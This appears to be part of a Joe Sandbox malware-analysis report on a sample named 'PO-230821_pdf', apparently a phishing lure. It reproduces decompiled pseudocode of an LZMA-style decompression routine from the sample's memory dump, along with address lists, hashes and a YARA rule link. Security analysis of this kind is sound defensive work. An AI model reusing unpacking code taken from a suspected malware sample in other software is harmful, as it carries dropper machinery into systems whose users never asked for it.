											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00407395
0x00407395
0x00407399
0x004073be
0x004073c8
0x00000000
0x0040739b
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a8
0x004073ac
0x004073ac
0x004073af
0x00407489
0x00407489
0x00407490
0x00407490
0x00407493
0x0040749a
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00000000
0x00407482
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x00000000
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00407524
0x00000000
0x00407399

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
